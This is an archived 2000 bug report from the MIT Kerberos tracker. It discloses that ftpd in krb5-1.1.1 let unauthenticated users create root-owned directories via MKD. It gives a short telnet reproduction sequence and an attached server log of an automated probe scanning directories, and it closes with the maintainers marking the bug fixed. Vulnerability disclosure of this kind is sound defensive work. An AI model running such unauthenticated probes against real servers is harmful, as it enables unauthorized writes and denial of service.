Skip Menu |
 

From Christopher@tfjc.com Wed Jun 14 02:33:31 2000
Received: from fort-point-station.mit.edu (FORT-POINT-STATION.MIT.EDU [18.72.0.53])
by rt-11.mit.edu (8.9.3/8.9.3) with ESMTP id CAA06383
for <bugs@RT-11.MIT.EDU>; Wed, 14 Jun 2000 02:33:27 -0400 (EDT)
Received: from Sally.TfJC.Com (sally.tfjc.com [216.32.33.239] (may be forged))
by fort-point-station.mit.edu (8.9.2/8.9.2) with ESMTP id CAA01618
for <krb5-bugs@mit.edu>; Wed, 14 Jun 2000 02:33:24 -0400 (EDT)
Received: from Shelby.TfJC (Shelby.TfJC [192.168.50.3])
by Sally.TfJC.Com (8.9.3/8.8.7) with ESMTP id XAA30111;
Tue, 13 Jun 2000 23:33:15 -0700
Received: from Mail.TfJC.Com (localhost.localdomain [127.0.0.1])
by Shelby.TfJC (8.9.3/8.8.7) with ESMTP id XAA01947;
Tue, 13 Jun 2000 23:33:13 -0700
Message-Id: <39472721.EBFD36DD@Mail.TfJC.Com>
Date: Tue, 13 Jun 2000 23:33:05 -0700
From: "Christopher R. Thompson" <Christopher@tfjc.com>
Sender: Chris@tfjc.com
To: krb5-bugs@mit.edu, "cert@cert.org" <cert@cert.org>
Subject: Ftp Security Bug. krb5-1.1.1

Show quoted text
>Number: 858
>Category: krb5-appl
>Synopsis: Ftp Security Bug. krb5-1.1.1
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible: tlyu
>State: closed
>Class: sw-bug
>Submitter-Id: unknown
>Arrival-Date: Wed Jun 14 02:34:00 EDT 2000
>Last-Modified: Mon Jul 9 16:46:55 EDT 2001
>Originator: "Christopher R. Thompson" <Christopher@tfjc.com>
>Organization:
>Release: krb5-1.1.1
>Environment:
>Description:
This is a multi-part message in MIME format.
--------------F7615CA233D622EED70B9E28
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hackers have been busy the last month trying to get into my kerberized
ftp site and Saturday while I was away someone managed to actually
create a directory as root in my / "root" directory. This was achieved
with the MKD command and is reproducible with the following commands.

telnet host 21
mkd test1
mkd test2
rmd test1
quit


"host" now contains the directory named "/test1". Directory "/test2" was
created and then deleted. Following each mkd/rmd command the ftpd host
requests "530 please login with USER and PASS." and then either "257 MKD
command successful." or "250 RMD command successful."

I have not examined the ftpd code yet but I can only hope this is the
only hole. Making and deleting directory entries is rather benign but
some unscrupulous hacker could engineer a DOS attack on unsuspecting ftp
hosts.

Note the attached FTP LOG. These appear to be automated scripts and are
a regular daily and weekly occurrence for me here.
--------------F7615CA233D622EED70B9E28
Content-Type: text/plain; charset=us-ascii;
name="test"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="test"

Jun 10 05:08:59 sally ftpd[21432]: connect from 129.125.104.178
Jun 10 05:08:59 sally ftpd[21432]: connection from 129.125.104.178 (flits104-178.flits.rug.nl) at Sat Jun 10 05:08:59 2000
Jun 10 05:08:59 sally ftpd[21432]: <--- 220
Jun 10 05:08:59 sally ftpd[21432]: Sally.TfJC.Com FTP server (Version 5.60) ready.
Jun 10 05:08:59 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:08:59 sally ftpd[21432]: <--- 530
Jun 10 05:08:59 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:08:59 sally ftpd[21432]: <--- 257
Jun 10 05:08:59 sally ftpd[21432]: MKD command successful.
Jun 10 05:09:00 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:00 sally ftpd[21432]: command: <CWD /incoming/>(16)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:00 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:00 sally ftpd[21432]: <--- 550
Jun 10 05:09:00 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:00 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:00 sally ftpd[21432]: command: <CWD /upload/>(14)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: <--- 550
Jun 10 05:09:01 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:01 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: command: <CWD /_vti_pvt/>(16)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: <--- 550
Jun 10 05:09:01 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:01 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:02 sally ftpd[21432]: command: <CWD /_vti_txt/>(16)
Jun 10 05:09:02 sally ftpd[21432]: <--- 530
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:02 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:02 sally ftpd[21432]: <--- 530
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:02 sally ftpd[21432]: <--- 550
Jun 10 05:09:02 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:02 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:02 sally ftpd[21432]: <--- 530
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:02 sally ftpd[21432]: command: <CWD /_vti_log/>(16)
Jun 10 05:09:02 sally ftpd[21432]: <--- 530
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: <--- 550
Jun 10 05:09:03 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:03 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: command: <CWD /wwwroot/>(15)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: <--- 550
Jun 10 05:09:03 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:03 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:04 sally ftpd[21432]: command: <CWD /anonymous/>(17)
Jun 10 05:09:04 sally ftpd[21432]: <--- 530
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:04 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:04 sally ftpd[21432]: <--- 530
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:04 sally ftpd[21432]: <--- 550
Jun 10 05:09:04 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:04 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:04 sally ftpd[21432]: <--- 530
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:04 sally ftpd[21432]: command: <CWD /public/>(14)
Jun 10 05:09:04 sally ftpd[21432]: <--- 530
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: <--- 550
Jun 10 05:09:05 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:05 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: command: <CWD /outgoing/>(16)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: <--- 550
Jun 10 05:09:05 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:05 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:06 sally ftpd[21432]: command: <CWD /cgi-bin/>(15)
Jun 10 05:09:06 sally ftpd[21432]: <--- 530
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:06 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:06 sally ftpd[21432]: <--- 530
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:06 sally ftpd[21432]: <--- 550
Jun 10 05:09:06 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:06 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:06 sally ftpd[21432]: <--- 530
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:06 sally ftpd[21432]: command: <CWD /tmp/>(11)
Jun 10 05:09:06 sally ftpd[21432]: <--- 530
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: <--- 550
Jun 10 05:09:07 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:07 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: command: <CWD /anonymous/_vti_pvt/>(26)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: <--- 550
Jun 10 05:09:07 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:07 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:08 sally ftpd[21432]: command: <CWD /anonymous/incoming/>(26)
Jun 10 05:09:08 sally ftpd[21432]: <--- 530
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:08 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:08 sally ftpd[21432]: <--- 530
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:08 sally ftpd[21432]: <--- 550
Jun 10 05:09:08 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:08 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:08 sally ftpd[21432]: <--- 530
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:08 sally ftpd[21432]: command: <CWD /mailroot/>(16)
Jun 10 05:09:08 sally ftpd[21432]: <--- 530
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: <--- 550
Jun 10 05:09:09 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:09 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: command: <CWD /ftproot/>(15)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: <--- 550
Jun 10 05:09:09 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:09 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:10 sally ftpd[21432]: command: <CWD /anonymous/pub/>(21)
Jun 10 05:09:10 sally ftpd[21432]: <--- 530
Jun 10 05:09:10 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:10 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:10 sally ftpd[21432]: <--- 530
Jun 10 05:09:10 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:10 sally ftpd[21432]: <--- 550
Jun 10 05:09:10 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:10 sally ftpd[21432]: atmark: c=-1
Jun 10 05:09:10 sally ftpd[21432]: lost connection

--------------F7615CA233D622EED70B9E28--

Show quoted text
>How-To-Repeat:
>Fix:
>Audit-Trail:

Responsible-Changed-From-To: gnats-admin->krb5-unassigned
Responsible-Changed-By: raeburn
Responsible-Changed-When: Sat Jun 23 01:37:25 2001
Responsible-Changed-Why:

Responsible-Changed-From-To: krb5-unassigned->tlyu
Responsible-Changed-By: raeburn
Responsible-Changed-When: Mon Jul 9 16:42:02 2001
Responsible-Changed-Why:

I *think* this is one of the ones you plugged a while back. Please
confirm it and close this PR if appropriate...

State-Changed-From-To: open-closed
State-Changed-By: tlyu
State-Changed-When: Mon Jul 9 16:46:28 2001
State-Changed-Why:

This has been fixed a while ago. The 1.2.2 release should have a fix
for it, among many other things.

Show quoted text
>Unformatted: